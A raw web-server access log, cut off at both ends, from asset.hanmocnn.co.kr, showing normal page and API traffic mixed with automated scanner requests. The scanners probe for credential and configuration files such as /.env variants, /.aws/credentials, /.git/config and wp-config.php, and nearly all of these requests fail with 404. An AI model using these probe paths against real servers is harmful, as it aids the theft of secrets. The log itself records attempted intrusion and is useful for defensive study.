10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[15/Feb/2026:03:46:26 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/wp-config.php" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[15/Feb/2026:03:46:26 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/config.js" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[15/Feb/2026:03:46:27 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/aws-config.js" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0" "-" -[15/Feb/2026:03:46:27 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/aws.config.js" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[15/Feb/2026:03:46:27 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/_debugbar/" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[15/Feb/2026:03:46:27 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/debugbar/" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0" "-" -[15/Feb/2026:03:46:27 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/debug/" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[15/Feb/2026:03:46:28 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/phpinfo.php" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[15/Feb/2026:03:46:28 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/info.php" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[15/Feb/2026:03:46:28 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/test.php" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0" "-" -[15/Feb/2026:03:46:28 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.aws/credentials" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0" "-" -[15/Feb/2026:03:46:29 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.aws/config" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[15/Feb/2026:03:46:29 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/aws-credentials" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[15/Feb/2026:03:46:29 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/aws.json" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[15/Feb/2026:03:46:29 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.s3cfg" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0" "-" -[15/Feb/2026:03:46:30 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.git/HEAD" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0" "-" -[15/Feb/2026:03:46:30 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.git/config" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[15/Feb/2026:04:11:52 +0000] - 405 405 - POST https asset.hanmocnn.co.kr "/" [Client 213.209.159.175] [Length 31] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:04:11:53 +0000] - 405 405 - POST https asset.hanmocnn.co.kr "/" [Client 213.209.159.175] [Length 31] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:04:39:26 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 2062] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:04:39:27 +0000] - 304 304 - GET https asset.hanmocnn.co.kr "/static/css/style.css?v=2.0" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[15/Feb/2026:04:39:27 +0000] - 304 304 - GET https asset.hanmocnn.co.kr "/static/js/app.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[15/Feb/2026:04:39:27 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/assets" [Client 222.117.41.51] [Length 1166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[15/Feb/2026:04:39:27 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/prices" [Client 222.117.41.51] [Length 940] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[15/Feb/2026:04:39:27 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/alerts/settings" [Client 222.117.41.51] [Length 183] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[15/Feb/2026:04:39:57 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/stream" [Client 222.117.41.51] [Length 3294] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[15/Feb/2026:07:32:18 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 136.112.154.46] [Length 2074] [Gzip 3.35] [Sent-to 192.168.0.250] "Go-http-client/1.1" "-" -[15/Feb/2026:07:57:22 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 34.122.92.195] [Length 2074] [Gzip 3.35] [Sent-to 192.168.0.250] "Go-http-client/1.1" "-" -[15/Feb/2026:07:57:23 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/favicon.ico" [Client 34.122.92.195] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Go-http-client/1.1" "-" -[15/Feb/2026:07:58:26 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 34.122.92.195] [Length 2062] [Gzip 3.35] [Sent-to 192.168.0.250] "YourUserAgentHere" "-" -[15/Feb/2026:09:11:44 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.env" [Client 2.57.122.173] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15" "-" -[15/Feb/2026:09:51:16 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 2062] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[15/Feb/2026:09:51:16 +0000] - 304 304 - GET https asset.hanmocnn.co.kr "/static/css/style.css?v=2.0" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[15/Feb/2026:09:51:16 +0000] - 304 304 - GET https asset.hanmocnn.co.kr "/static/js/app.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[15/Feb/2026:09:51:16 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/prices" [Client 222.117.41.51] [Length 940] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[15/Feb/2026:09:51:16 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/assets" [Client 222.117.41.51] [Length 1166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[15/Feb/2026:09:51:16 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/alerts/settings" [Client 222.117.41.51] [Length 183] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[15/Feb/2026:09:51:16 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/favicon.ico" [Client 222.117.41.51] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[15/Feb/2026:09:51:16 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/favicon-32x32.png" [Client 222.117.41.51] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[15/Feb/2026:09:51:51 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/stream" [Client 222.117.41.51] [Length 3297] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[15/Feb/2026:10:51:04 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 211.234.204.1] [Length 2062] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" -[15/Feb/2026:10:51:04 +0000] - 304 304 - GET https asset.hanmocnn.co.kr "/static/css/style.css?v=2.0" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/" -[15/Feb/2026:10:51:04 +0000] - 304 304 - GET https asset.hanmocnn.co.kr "/static/js/app.js" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/" -[15/Feb/2026:10:51:04 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/assets" [Client 211.234.204.1] [Length 1166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/" -[15/Feb/2026:10:51:04 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/prices" [Client 211.234.204.1] [Length 940] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/" -[15/Feb/2026:10:51:04 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/alerts/settings" [Client 211.234.204.1] [Length 183] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/" -[15/Feb/2026:10:51:06 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/stream" [Client 211.234.204.1] [Length 471] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/" -[15/Feb/2026:13:45:54 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/.git/config" [Client 173.212.204.156] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" -[15/Feb/2026:13:45:55 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.git/config" [Client 173.212.204.156] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "http://asset.hanmocnn.co.kr/.git/config" -[15/Feb/2026:18:08:21 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/wp-config" [Client 45.148.10.238] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 4.4.2; SAMSUNG-SM-G900A Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.94 Mobile Safari/537.36" "-" -[15/Feb/2026:18:08:21 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.env.bak" [Client 45.148.10.238] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; CrOS x86_64 11647.154.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.114 Safari/537.36" "-" -[15/Feb/2026:18:08:21 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/awsconfig.js" [Client 45.148.10.238] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/71.0.3578.98 Chrome/71.0.3578.98 Safari/537.36" "-" -[15/Feb/2026:18:08:21 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.env.production" [Client 45.148.10.238] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 9; ONEPLUS A3010) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36" "-" -[15/Feb/2026:18:08:21 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.env.live" [Client 45.148.10.238] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 8.0.0; moto e5 plus) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.89 Mobile Safari/537.36" "-" -[15/Feb/2026:18:08:21 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/awstats/.env" [Client 45.148.10.238] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Opera/9.80 (Android; Opera Mini/42.0.2254/150.36; U; en) Presto/2.12.423 Version/12.16" "-" -[15/Feb/2026:18:08:21 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.env" [Client 45.148.10.238] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Opera/9.20 (Macintosh; Intel Mac OS X; U; en)" "-" -[15/Feb/2026:18:08:21 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/crm/.env" [Client 45.148.10.238] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A403 Safari/8536.25" "-" -[15/Feb/2026:18:08:22 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.env.prod" [Client 45.148.10.238] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 6.0.1; SM-J700F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36" "-" -[15/Feb/2026:18:08:22 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/aws.env" [Client 45.148.10.238] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36" "-" -[15/Feb/2026:18:08:22 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/config.env" [Client 45.148.10.238] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36" "-" -[15/Feb/2026:18:08:22 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.aws/credentials" [Client 45.148.10.238] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" "-" -[15/Feb/2026:20:02:22 +0000] - 405 405 - POST https asset.hanmocnn.co.kr "/" [Client 85.11.167.25] [Length 31] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr" -[15/Feb/2026:20:02:23 +0000] - 405 405 - POST https asset.hanmocnn.co.kr "/" [Client 85.11.167.25] [Length 31] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr" -[15/Feb/2026:20:27:14 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 211.234.204.1] [Length 2062] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" -[15/Feb/2026:20:27:15 +0000] - 304 304 - GET https asset.hanmocnn.co.kr "/static/css/style.css?v=2.0" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/" -[15/Feb/2026:20:27:15 +0000] - 304 304 - GET https asset.hanmocnn.co.kr "/static/js/app.js" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/" -[15/Feb/2026:20:27:15 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/prices" [Client 211.234.204.1] [Length 944] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/" -[15/Feb/2026:20:27:15 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/assets" [Client 211.234.204.1] [Length 1166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/" -[15/Feb/2026:20:27:15 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/alerts/settings" [Client 211.234.204.1] [Length 183] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/" -[15/Feb/2026:20:27:55 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/stream" [Client 211.234.204.1] [Length 3800] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/" -[15/Feb/2026:23:01:15 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 3.128.190.80] [Length 2074] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0" "-" -[16/Feb/2026:01:44:50 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 2062] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:01:44:50 +0000] - 304 304 - GET https asset.hanmocnn.co.kr "/static/css/style.css?v=2.0" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[16/Feb/2026:01:44:50 +0000] - 304 304 - GET https asset.hanmocnn.co.kr "/static/js/app.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[16/Feb/2026:01:44:50 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/assets" [Client 222.117.41.51] [Length 1165] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[16/Feb/2026:01:44:50 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/prices" [Client 222.117.41.51] [Length 929] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[16/Feb/2026:01:44:50 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/favicon.ico" [Client 222.117.41.51] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[16/Feb/2026:01:44:51 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/favicon-32x32.png" [Client 222.117.41.51] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[16/Feb/2026:01:44:51 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/alerts/settings" [Client 222.117.41.51] [Length 183] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[16/Feb/2026:01:45:31 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/stream" [Client 222.117.41.51] [Length 4139] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" -[16/Feb/2026:02:28:32 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 195.178.110.132] [Length 2074] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[16/Feb/2026:02:28:32 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.env" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[16/Feb/2026:02:28:33 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/static/js/app.js" [Client 195.178.110.132] [Length 17770] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[16/Feb/2026:02:28:33 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/%22/static/js/app.js%22" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[16/Feb/2026:02:28:33 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.env.bak" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[16/Feb/2026:02:28:33 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.env.save" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[16/Feb/2026:02:28:34 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.env.backup" [Client 195.178.110.132] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0" "-" -[16/Feb/2026:02:28:34 +0000] - 404 404 